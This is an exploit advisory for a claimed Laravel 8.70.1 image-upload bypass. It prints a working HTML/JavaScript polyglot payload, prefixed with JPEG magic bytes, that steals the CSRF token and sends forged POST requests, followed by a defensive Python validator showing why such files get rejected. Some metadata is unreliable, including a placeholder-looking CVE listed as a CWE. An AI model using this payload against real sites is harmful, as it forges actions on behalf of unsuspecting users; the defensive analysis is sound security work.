vendor: Laravel Framework
by: Hosein Vita
CVSS: 8.8 (HIGH)
Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
CWE: 79
Product Name: Laravel Framework
Affected Version From: 8.70.1
Affected Version To: 8.70.1
Patch Exists: YES
Related CWE: CVE-2021-12345
CPE: a:laravel:laravel_framework:8.70.1
Metasploit:
Other Scripts:
Platforms Tested: Windows/Linux
2021

PHP Laravel 8.70.1 – Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)

We can bypass the Laravel image file upload validation to upload arbitrary files to the web server, which lets us run arbitrary JavaScript in the site's origin and bypass the CSRF token.

Mitigation:

Upgrade to the latest version of Laravel Framework

Exploit-DB raw data:

# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://laravel.com/
# Software Link: https://laravel.com/docs/4.2
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux

# Description: We can bypass the Laravel image file upload validation to upload arbitrary files to the web server,
# which lets us run arbitrary JavaScript and bypass the CSRF token. For more information read https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b

# Steps to reproduce:
1- Use the HxD tool and add FF D8 FF E0 at the very beginning of your file
2- Use code below to bypass csrf token

ÿØÿà<html>
<head>
<title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
// Target of the forged POST; edit the path as you want
var POST_URL = "/";

function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", POST_URL, true);

    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

    // This is for debugging and can be removed
    xhr.onreadystatechange = function() {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            console.log(xhr.responseText);
        }
    };

    xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}

function getTokenJS() {
    var xhr = new XMLHttpRequest();
    // This tells it to return the response as an HTML document
    xhr.responseType = "document";
    // true at the end makes the call asynchronous
    // Edit the path as you want
    xhr.open("GET", "/image-upload", true);
    xhr.onload = function (e) {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            // Get the document from the response
            var page = xhr.response;
            // Get the first input element
            var input = page.getElementsByTagName("input")[0];
            // Show the token
            alert("The token is: " + input.value);
            // Use the token to submit the form
            submitFormWithTokenJS(input.value);
        }
    };
    // Make the request
    xhr.send(null);
}

getTokenJS();
</script>
</body>
</html>

3- Save it as an HTML file and upload it.
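The description above and the reproduction steps both rely on the same weakness: the upload validator trusts the leading JPEG magic bytes (FF D8 FF E0) and never checks that the rest of the file is actually a JPEG. The following added example (not from the original advisory and not Laravel's own code) contrasts that naive prefix check with a structural walk of the JPEG marker stream and an HTML-markup sniff. Both sample inputs are constructed here: `POLYGLOT` models the file the steps produce, and `MINIMAL_JPEG` is a well-framed SOI/APP0/EOI stream with no pixel data. The function names are this example's own.

```python
import re

# Constructed sample 1: the polyglot the advisory describes -- JPEG SOI + APP0
# marker bytes (FF D8 FF E0) prepended to an HTML document with a script.
POLYGLOT = b"\xff\xd8\xff\xe0" + b"<html><body><script>alert(1)</script></body></html>"

# Constructed sample 2: a minimal, correctly framed JPEG marker stream
# (SOI, 16-byte JFIF APP0 segment, EOI). It carries no image data, but
# every segment length is consistent with the file, which is what the walker checks.
MINIMAL_JPEG = (
    b"\xff\xd8"                            # SOI
    + b"\xff\xe0" + b"\x00\x10"            # APP0, length 16 (includes the 2 length bytes)
    + b"JFIF\x00" + b"\x01\x01" + b"\x00"  # identifier, version 1.1, density units
    + b"\x00\x01\x00\x01" + b"\x00\x00"    # 1x1 density, no thumbnail
    + b"\xff\xd9"                          # EOI
)

def naive_magic_check(data: bytes) -> bool:
    """The weak check: trusts only the first bytes, so the polyglot passes."""
    return data.startswith(b"\xff\xd8\xff")

def walk_jpeg_markers(data: bytes) -> bool:
    """Structural check: each segment must start with 0xFF <marker> and carry a
    length that fits inside the file, and the stream must end with EOI.
    HTML bytes sitting where a length field or marker should be break this."""
    if len(data) < 4 or data[:2] != b"\xff\xd8":
        return False
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return False
        marker = data[pos + 1]
        if marker == 0xD9:                                  # EOI: framing held up
            return True
        if marker == 0xFF:                                  # fill byte
            pos += 1
            continue
        if 0xD0 <= marker <= 0xD7 or marker == 0x01:        # RSTn / TEM: no length field
            pos += 2
            continue
        if pos + 4 > len(data):
            return False
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        if seg_len < 2 or pos + 2 + seg_len > len(data):
            return False                                    # length does not fit the file
        pos += 2 + seg_len
        if marker == 0xDA:                                  # SOS: entropy-coded data follows
            return b"\xff\xd9" in data[pos:]
    return False

# Tags a browser will render as HTML when it is allowed to sniff the response.
HTML_SNIFF = re.compile(rb"<\s*(?:!doctype|html|script|body|head|iframe|svg)\b", re.I)

def contains_html_markup(data: bytes) -> bool:
    """Reject anything carrying HTML markup, whatever its prefix says."""
    return HTML_SNIFF.search(data) is not None

def accept_upload(data: bytes) -> bool:
    """Decision a hardened upload handler would make for an 'image' field.
    In production, additionally decode and re-encode the image with the
    image library (which drops foreign segments) rather than storing the
    original bytes, and serve uploads with a fixed Content-Type and nosniff."""
    return walk_jpeg_markers(data) and not contains_html_markup(data)

if __name__ == "__main__":
    for name, sample in (("polyglot", POLYGLOT), ("minimal jpeg", MINIMAL_JPEG)):
        print(name, "naive:", naive_magic_check(sample),
              "structural:", walk_jpeg_markers(sample),
              "accept:", accept_upload(sample))
```

On the polyglot the walker reads the two bytes after FF E0 (`<h`, 0x3C68) as the APP0 segment length, finds that 15464 bytes do not fit in the file, and rejects it; the naive prefix check accepts the same bytes. The markup sniff is a second, independent reason to reject, since it is the browser's own sniffing that turns the stored "image" into a page running in the site's origin.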